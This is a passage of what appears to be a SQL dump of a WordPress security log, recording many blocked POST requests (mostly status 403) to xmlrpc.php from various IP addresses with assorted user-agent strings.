Safari\\/537.36\"}','K0ZOsHT9jtLY35hoxSiFQ4Ub',0,1681705200.8092,1210,'','POST',403,0,515,0,1,'',0),('51.195.124.72',868449352,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','pGz25NiwmXbDqFgnahrcO84x',0,1681705201.2679,1385,'','POST',403,0,515,0,1,'',0),('14.225.192.104',249675880,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','iIdTUatow03GeXsfb5ROn78L',0,1681705210.7284,884,'','POST',403,0,515,0,1,'',0),('213.152.187.215',3583556567,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','4i5lrnI9eZWoX1P30afYuskv',0,1681706374.2304,737,'','POST',403,0,515,0,1,'',0),('141.95.168.55',2371856439,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','jI6AboX0Zzp7ELf3JPR2hcQY',0,1681713378.0264,646,'','POST',403,0,515,0,1,'',0),('185.2.4.56',3103917112,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','Hlote4xQAJUg71NBPLkb2uYW',0,1681713381.2690,611,'','POST',403,0,515,0,1,'',0),('5.9.59.22',84491030,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','0zvyawtZ2nm7JbQcN6Uh1Hds',0,1681713387.8150,654,'','POST',403,0,515,0,1,'',0),('149.129.227.62',2508317502,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','UbTu7Gd1zJSjxg5ilfQCOD8c',0,1681716485.2199,2372,'','POST',403,0,515,0,1,'',0),('207.55.248.19',3476551699,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','3njsw85L7e0dFikKgOayvTDB',0,1681716486.7507,1428,'','POST',403,0,515,0,1,'',0),('188.225.21.131',3168867715,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','fO3FWQMnuNrt57j2ziwo9m6s',0,1681716493.1029,655,'','POST',403,0,515,0,1,'',0),('149.129.227.62',2508317502,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','LWerZMFh5yxqtJIjCEdnV9Db',0,1681716496.6048,615,'','POST',403,0,515,0,1,'',0),('185.156.175.35',3114053411,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','XjwdhZYy89e4unIEfO1rJlvg',0,1681717340.9158,3551,'','POST',403,0,515,0,1,'',0),('62.102.148.154',1046910106,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','2IyJT6auckY4Z9nKzHChgR0p',0,1681717363.3814,682,'','POST',403,0,515,0,1,'',0),('207.180.207.149',3484733333,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','uOi4tBZdmVoDbEaG1X6PKSw2',0,1681723533.8051,713,'','POST',403,0,515,0,1,'',0),('54.36.174.113',908373617,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','yHzhk9Vr0i2IuGRKds4o8a3m',0,1681723540.3548,563,'','POST',403,0,515,0,1,'',0),('178.62.105.205',2990434765,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','yh5MTJNxYLKzgG4Cur6pvjtl',0,1681723549.0102,556,'','POST',403,0,515,0,1,'',0),('213.152.162.84',3583550036,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','panmQO0bhKr6y3WMS4jvZU2D',0,1681723599.7400,623,'','POST',403,0,515,0,1,'',0),('146.70.61.139',2454076811,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','hDXtgyqZE2dGTW9pPNVU0SHC',0,1681723672.0924,627,'','POST',403,0,515,0,1,'',0),('198.71.235.55',3326602039,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','29GSE6LItyrl5eawHBRVYvsq',0,1681723929.1718,3199,'','POST',403,0,515,0,1,'',0),('103.171.180.165',1739306149,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','B0QJqP372LsUCG4gToevfNjt',0,1681723932.5649,1106,'','POST',403,0,515,0,1,'',0),('103.146.176.238',1737666798,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','taJdYFSp57Ov4bsINuQfhoiU',0,1681723933.0480,1128,'','POST',403,0,515,0,1,'',0),('101.32.41.71',1696606535,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','Gj0UPfuXqne9kFI72JRWVC15',0,1681723940.6480,608,'','POST',403,0,515,0,1,'',0),('82.130.0.72',1384251464,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','Zf61CHTUQ8MvRh4G9doIcm30',0,1681723951.6516,720,'','POST',403,0,515,0,1,'',0),('185.227.134.226',3118696162,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','gHLRaO2Xf5zN6GEsSFtAW1b9',0,1681723955.1576,570,'','POST',403,0,515,0,1,'',0),('103.171.180.165',1739306149,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','CXQUxswat4A5DmlvkV6Wi0TO',0,1681723960.1637,693,'','POST',403,0,515,0,1,'',0),('103.101.161.81',1734713681,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','sdPipgE7YaA54uz3rLFI0JOf',0,1681725989.5606,563,'','POST',403,0,515,0,1,'',0),('213.152.162.89',3583550041,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','3814lQ2O6Mi5IRHsLVwXbvfx',0,1681726236.4683,3870,'','POST',403,0,515,0,1,'',0),('185.2.4.56',3103917112,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','uDqWFmo8i7EOjdrLI4b1pygN',0,1681727143.3961,4257,'','POST',403,0,515,0,1,'',0),('176.56.56.133',2956474501,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','CzqoG46hnxSPg8EHW2Iy39Je',0,1681727155.6315,626,'','POST',403,0,515,0,1,'',0),('47.242.62.161',804404897,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','OjJI8M63tXd9SPquVZbmp7Ry',0,1681727163.4889,612,'','POST',403,0,515,0,1,'',0),('45.94.58.150',761150102,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','yIcQZW3td0Rb7qDX65rlHpNm',0,1681727172.9121,578,'','POST',403,0,515,0,1,'',0),('185.30.32.174',3105759406,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','AU928xYWdcwvo4hnt7QjNMfF',0,1681727182.3264,633,'','POST',403,0,515,0,1,'',0),('138.186.9.114',2327447922,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','VnMav6DhGXwrmox41t5Nge0S',0,1681727191.2625,1582,'','POST',403,0,515,0,1,'',0),('114.215.93.65',1926716737,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','59RKrAZpYXCJiFnHIjsx2vLg',0,1681730730.1482,661,'','POST',403,0,515,0,1,'',0),('103.130.219.197',1736629189,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','8qvJpuWExmTIRfBZNPOhUX59',0,1681730733.2566,1328,'','POST',403,0,515,0,1,'',0),('139.162.58.251',2342664955,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','ohAdzWIS8ymGtHJVcvjMaqfn',0,1681730733.4825,1302,'','POST',403,0,515,0,1,'',0),('82.223.115.237',1390375917,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','7xcioOCz4nyMKWGsHXtZEmvh',0,1681730739.5853,592,'','POST',403,0,515,0,1,'',0),('108.170.55.202',1823094730,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','TE9Vvzm2LKR85w4nPBWxkXGd',0,1681730748.8149,607,'','POST',403,0,515,0,1,'',0),('18.218.139.173',316312493,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','wKqLs3j76RDcd1rQIVYXBam8',0,1681731377.5912,3531,'','POST',403,0,515,0,1,'',0),('45.32.106.77',757099085,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','xRYC9mHwJhrtsMpfWAujZ34S',0,1681731384.1186,1548,'','POST',403,0,515,0,1,'',0),('103.117.180.72',1735767112,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','nYtw8Ul4QsqRVBAWJFu0dhea',0,1681731384.6489,1710,'','POST',403,0,515,0,1,'',0),('216.24.188.8',3625499656,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','ykOeWYQcwh67Z9v4rKtudxjU',0,1681731384.8460,1713,'','POST',403,0,515,0,1,'',0),('173.231.207.89',2917650265,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','QUcaJBlbF07fkgOpViwWd3hC',0,1681731397.0487,578,'','POST',403,0,515,0,1,'',0),('60.205.227.183',1020126135,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','Zv8xrs6G49O1VBcnJ2yWlILt',0,1681731403.4979,883,'','POST',403,0,515,0,1,'',0),('68.178.228.199',1152574663,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','lriP36gSOXLHRIkoEnvFz018',0,1681731404.0785,925,'','POST',403,0,515,0,1,'',0),('198.54.124.210',3325459666,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','lN7IFV0JEHpgdX21MnKe634z',0,1681731413.5111,681,'','POST',403,0,515,0,1,'',0),('51.132.254.35',864353827,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','Pc3NUHXjS8qsoO9MfD5nauFL',0,1681731419.6625,699,'','POST',403,0,515,0,1,'',0),('178.32.201.69',2988493125,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','LtnKiBgPrZD9YFbfzm7aTxow',0,1681731420.4904,625,'','POST',403,0,515,0,1,'',0),('89.107.60.10',1500199946,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','GamU7SehCtN18ox5rJkFcORj',0,1681731430.1821,1044,'','POST',403,0,515,0,1,'',0),('213.152.162.15',3583549967,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','LXQuIw7eBj6HCoJUTKr9cG1q',0,1681732022.5045,3948,'','POST',403,0,515,0,1,'',0),('146.70.61.139',2454076811,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','frS8016sThLe2MXzWnHk5EPG',0,1681733520.0151,4921,'','POST',403,0,515,0,1,'',0),('202.61.232.109',3393054829,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','rpSvODy5xHmwzalf6UNs098F',0,1681736024.7382,3739,'','POST',403,0,515,0,1,'',0),('5.135.143.169',92770217,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','PzI1OJVwpdN0SvFaDrWCQqmc',0,1681736023.4613,5022,'','POST',403,0,515,0,1,'',0),('202.61.232.109',3393054829,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','vZmIPk120cKhuVE5F7HQlsjR',0,1681736030.0058,668,'','POST',403,0,515,0,1,'',0),('184.168.98.254',3098043134,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','eS7BQXiOnwHd51cTDVt0sRJk',0,1681736035.5899,576,'','POST',403,0,515,0,1,'',0),('207.55.248.19',3476551699,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','z7xc2TinVkrWBejqONZMJdSo',0,1681736049.0849,583,'','POST',403,0,515,0,1,'',0),('207.55.248.19',3476551699,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','KAkOopDwcvE3jLsyBR7e0lQN',0,1681736054.5010,549,'','POST',403,0,515,0,1,'',0),('184.154.83.114',3097121650,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','uifzQ56RhbOsJxWmTNCXBl4K',0,1681736056.4128,585,'','POST',403,0,515,0,1,'',0),('46.242.232.109',787671149,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','QlE1MI86LPqWpuhcRYjVrosA',0,1681736069.4577,576,'','POST',403,0,515,0,1,'',0),('207.55.248.19',3476551699,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','gCYQW3nAiMBu6IvcPwTKqpj9',0,1681736072.2133,404,'','POST',404,0,515,0,1,'',0),('103.117.180.72',1735767112,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','Vsnvuk5OAxqfz1raHF9meUIc',0,1681736076.6662,552,'','POST',403,0,515,0,1,'',0),('103.221.223.238',1742594030,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','UeprfB2nsF1cqy8jARKLmOzx',0,1681737471.6462,724,'','POST',403,0,515,0,1,'',0),('18.218.139.173',316312493,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','SIWGkXo61Lmawg0cKeOJu5xy',0,1681737474.1317,563,'','POST',403,0,515,0,1,'',0),('89.201.167.100',1506387812,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','w1yaihWY073RZjcmpALMODro',0,1681737484.5725,587,'','POST',403,0,515,0,1,'',0),('103.255.237.7',1744825607,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','tkO5byXRngmi0CzVdewuN9Pj',0,1681737487.2557,634,'','POST',403,0,515,0,1,'',0),('207.180.207.149',3484733333,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','D6GKNEdcafsJu8SH2m03ioIW',0,1681739792.2354,3491,'','POST',403,0,515,0,1,'',0),('46.38.249.174',774306222,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','CYxItyZ6mbE0UfA7HOhK1iSq',0,1681739793.4293,2993,'','POST',403,0,515,0,1,'',0),('44.234.1.54',753533238,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','mZwt5prISzkMP82T7dfCVULY',0,1681739796.9339,665,'','POST',403,0,515,0,1,'',0),('82.165.86.47',1386567215,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','vK6US8XcAmH2W0FVElrsjih9',0,1681739803.6528,600,'','POST',403,0,515,0,1,'',0),('66.42.49.228',1110061540,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','WrzTCyKvad5tbUAouexcsEP9',0,1681739811.4294,596,'','POST',403,0,515,0,1,'',0),('108.170.11.42',1823083306,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','Ps4a9oK1zw7qyMV8I6UDpQWi',0,1681739813.9947,572,'','POST',403,0,515,0,1,'',0),('189.126.122.183',3179182775,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','7XlKkodGVyMP4aS9DxWEisu5',0,1681739815.4558,559,'','POST',403,0,515,0,1,'',0),('85.10.148.169',1426756777,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','d5j6BRXMLx1viy8fS2tQOCwb',0,1681739822.0752,573,'','POST',403,0,515,0,1,'',0),('81.169.144.135',1370067079,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','KCypd03axqUHv29VFkPnSGTA',0,1681739828.6808,612,'','POST',403,0,515,0,1,'',0),('66.29.141.9',1109232905,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','q4xCnOpLPjc6uid8NDRTMQXe',0,1681739830.8071,645,'','POST',403,0,515,0,1,'',0),('204.93.196.26',3428697114,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','rLP9IZU8WaKi64lJn7hHgBkV',0,1681740707.8695,594,'','POST',403,0,515,0,1,'',0),('51.132.254.35',864353827,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','KlnuPRaz8ksVAeOCBWJDGbh2',0,1681740716.6695,628,'','POST',403,0,515,0,1,'',0),('194.65.141.201',3259076041,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','wydLY7ijIx6AGBDMpHogcvaf',0,1681740719.5005,550,'','POST',403,0,515,0,1,'',0),('139.59.13.196',2335903172,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','ReWMJ8gUouGaHCdTim9ABNkQ',0,1681740725.2277,566,'','POST',403,0,515,0,1,'',0),('46.183.220.203',783801547,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','xOGtD6YcIdFHmEhKeaRlWjV5',0,1681740778.5260,2741,'','POST',403,0,515,0,1,'',0),('194.187.251.163',3267099555,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','uLiPE1vHz9Zt3kqO5RFQohls',0,1681741438.2931,4476,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','KV2iJ4mjdOAERHyuZfeYBI75',0,1681745223.0063,583,'','POST',403,0,515,0,1,'',0),('207.180.207.149',3484733333,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','kATmS2vgflaQjbEFWLsXRVNH',0,1681745226.7294,565,'','POST',403,0,515,0,1,'',0),('192.64.117.65',3225449793,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 